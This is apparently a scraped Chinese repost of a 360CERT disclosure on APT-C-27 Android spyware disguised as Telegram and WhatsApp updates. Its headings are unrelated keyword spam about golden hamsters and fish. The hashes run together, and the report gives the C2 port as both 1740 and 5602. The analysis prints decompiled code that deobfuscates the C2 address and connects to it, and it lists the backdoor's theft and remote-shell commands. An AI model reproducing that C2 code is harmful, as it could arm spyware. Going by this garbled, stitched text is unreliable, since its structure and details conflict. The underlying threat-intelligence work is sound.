干货分享（黄金鼠咬人吗）黄金鼠的照片，黄金鼠APT-C-27 移动攻击活动披露，中天系统网页登录，l&d，

1.黄金鼠鱼

0x00 背景介绍黄金鼠组织（APT-C-27）对叙利亚地区展开了有组织、有计划、有针对性的长时间不间断攻击其团伙主要以APK、PE、VBS、JS文件作为攻击载体，涉及Android和Windows两大平台，利用社交网络和鱼叉邮件等方式散布和传播恶意载荷。

2.黄金鼠图片

对黄金鼠组织基础设施进行长期监控，发现近期有新的移动恶意软件投入使用，360CERT 对本次新一轮的移动攻击活动进行披露0x01 活动概述本次捕获到的样本，使用了黄金鼠固有资产82.137.255.56，并且样本TTP与黄金鼠高度重合，所以我们高度自信，这是APT-C-27新一轮的移动攻击活动。

3.黄金鼠鱼吃小鱼吗

今年十月中旬，360CERT在 《"黄金鼠"组织近期攻击样本分析》 中对黄金鼠PC平台攻击活动进行披露，发现该组织基础设施高度复用长期跟踪过程中，捕获到最新投入使用的安卓恶意软件经过拓展，发现在2017到2018年活跃的样本如下：。

4.黄金鼠鱼怎么繁殖

03cbba87c2130a67cece5d009f1b2f6ebd2e43280a20cd126ef13e25ebbe8dba8ee34e60b25a957b19c67606396ae04ca10b2097016eb292f9cf15a7

5.黄金鼠吸鱼怎办

219ae76db7c1ad04b5985a2476cf7cdd26c69b00226ceabd4971a43a6b8641399a589f93b19a752c2727cb46f8ceaca2a6a8ca299a05f7232c8a9a5b

6.黄金鼠动画片

2e1b39c86044e2e83515068198cd1c7cc598cd2c57eec6f0b8fb47933d81d0af6ecba944ea93e5ee5d9c175d8b84c03c7e656e5b29a7b9ab69e5a17b

7.黄金鼠游戏

6cc07434307e7da11e37a86fa449eac810bffc5091f0c8313052d7cf4b0ed24445699e741890b4e8a1d5e20efa26251ddb115c574860a7a3314141d8

8.黄金鼠的寓意是什么意思

a619d354b60f9f7ad149d4a3b86a8598c2a474c6af6133e2985ebbf3224c421e156222b9ed5c8ad1bf15b8d406afd30e50a0f7bcf3d2b4469c47cbe4

9.黄金鼠手串

ca44a5ed83636cc233c2a78aac83809f9d916427cbae43259dd89e5806e722e282fb68a3009fca2dd8a711aaa008f3bf18cd1a77008d7bd674630e99

10.黄金鼠吃什么

d9c09f7d8df0276d55cdd15de62a7b073162a3bfe0bf86e5215faea63f6916512d9c3f498d1a6e99攻击样本伪装成WhatsApp、Telegram、ChatPrivacy、ChatSecure或者系统更新补丁，通过钓鱼邮件或者即时通信软件进行传播。

最常使用的签名SHA1：560179d86732f0197a3d27175a6ae53fabdd42d72538d6e8c0d1b5d42faa7c25aa8af955a3a02a218f59154986ed5acbb57037ada2049fce0c075523

5388e926d9b95a607a25e341d8d199f33da5764a最常使用的资源文件SHA1：2a162cdce82782bb10a476f25c6fe39b91fef3054005c61c64b9a286991526942d4ceba4619c6c86

6467c9b2f7361f066e2fa884b454646024dca191近两年的移动端攻击活动如下：

近期新捕获到活动的样本（d92a8b3e5804b7b081063e73175fa3a7e20ed691），伪装成Telegram应用，样本行为以及C2结构变化不大最新样本详细分析如下：0x02 样本详细分析。

样本运行截图：

com.sevandbatch.augseva_*.hzma.PcketPrvidr.java 中声明了 f_IP_RAW 以及 f_OIRT_RAWpublicstatic String f_IP_RAW =

"@uu2_1u37u_2#u#.#u6";publicstaticint f_PORT_RAW = 1640;publicstatic String get_ipraw(){    return f_IP_RAW.replace(

"@", "8").replace("u", "").replace(".", ".").replace("#", "5"); }In[3]: tmpa.replace("@", "8").replace(

"u", "").replace(".", ".").replace("#", "5") Out[3]: 82_137_255.56synchronized (PcketPrvidr.f_socket) {    PcketPrvidr.f_socket.connect(

new InetSocketAddress(lbyName_InetAddress, PcketPrvidr.f_PORT_RAW + 100), 2500); }通信地址为 82.137.255.56:1740

出现黄金鼠组织的相关用户名关键词Mr.R@dd3xRaddex_Raddxx行为摘要

获得移动数据网络状态

获得当前路径

获得设备当前信息已经状态

获得wifi名称

以root执行命令

注册广播接受类，对系统关机事件进行处理。并且尝试获得root权限

通过辅助功能接口，对短消息内容进行读取并且保存

注册约定的命令编号

相机拍摄当前情况照片改变C2地址执行内容复制文件删除文件下载文件GPS关闭GPS开启获得安装应用获得当前C2信息获得调用log获得通讯录获得文件获得短消息创建目录移动文件重命名文件执行文件交互式shell

开始录音停止录音上传文件Ping通过PcketPrvidr.java->HandlePacket进行相应操作建立外部连接 

回传信息方式

读取待传递对象，将对象格式化成xml格式通过thoughtworks.xstream.XStreamer.java中实现的方法进行

然后再以如下格式再组成新的xml，通过socket直接发送命令编号对象内容成功状态附带消息并且，我们在源代码中发现使用了阿拉伯语

新活动的样本与往期样本差别不大，历史样本摘要如下：

0x03 基础设施分析后门程序使用IP和C2服务器通信主机IP为:82.137.255.56，通信端口为:5602这个IP地址是黄金鼠组织的固有IP资产，曾经多次在其攻击活动中出现该IP的地理位置位于叙利亚，ASN为AS29256。

目前仅开放了80端口。

0x04 总结样本内容使用了阿拉伯语，很明显，本次活跃的移动攻击活动仍是针对阿拉伯国家样本的代码注释和源代码中使用了阿拉伯语，可以判断黄金鼠组织成员熟练掌握阿拉伯文阿拉伯语可能是其母语本次使用的C2服务器是黄金鼠组织的固有资产，常常使用不同的端口来区分攻击线路，本次使用的端口1740，作为移动端固定攻C2端口，在往期攻击活动中曾经出现过。

从历史活跃来看，移动端攻击没有去年强烈，并且整体的攻击策略没有改变，依旧是伪装知名聊天软件更新，系统更新，诱惑受害者下载安装最新发现的样本表明，黄金鼠在移动端的攻击活动依旧会持续下去0x05 IOCsFile:

03cbba87c2130a67cece5d009f1b2f6ebd2e43280a20cd126ef13e25ebbe8dba8ee34e60b25a957b19c67606396ae04ca10b2097016eb292f9cf15a7

219ae76db7c1ad04b5985a2476cf7cdd26c69b00226ceabd4971a43a6b8641399a589f93b19a752c2727cb46f8ceaca2a6a8ca299a05f7232c8a9a5b

2e1b39c86044e2e83515068198cd1c7cc598cd2c57eec6f0b8fb47933d81d0af6ecba944ea93e5ee5d9c175d8b84c03c7e656e5b29a7b9ab69e5a17b

6cc07434307e7da11e37a86fa449eac810bffc5091f0c8313052d7cf4b0ed24445699e741890b4e8a1d5e20efa26251ddb115c574860a7a3314141d8

a619d354b60f9f7ad149d4a3b86a8598c2a474c6af6133e2985ebbf3224c421e156222b9ed5c8ad1bf15b8d406afd30e50a0f7bcf3d2b4469c47cbe4

ca44a5ed83636cc233c2a78aac83809f9d916427cbae43259dd89e5806e722e282fb68a3009fca2dd8a711aaa008f3bf18cd1a77008d7bd674630e99

d9c09f7d8df0276d55cdd15de62a7b073162a3bfe0bf86e5215faea63f6916512d9c3f498d1a6e99d92a8b3e5804b7b081063e73175fa3a7e20ed691

IP:82.137.255.560x06 时间线2018-12-25 360CERT 捕获样本2018-12-26 360CERT 开始分析样本2018-12-29 360CERT 360CERT完成本次报告

0x07 参考链接"黄金鼠"组织近期攻击样本分析https://cert.360.cn/report/detail?id=b9cf062c42d64a81886a687caea51af6长按下方二维码关注360CERT！谢谢你的关注！

注：360CERT官方网站提供完整详情，点击阅读原文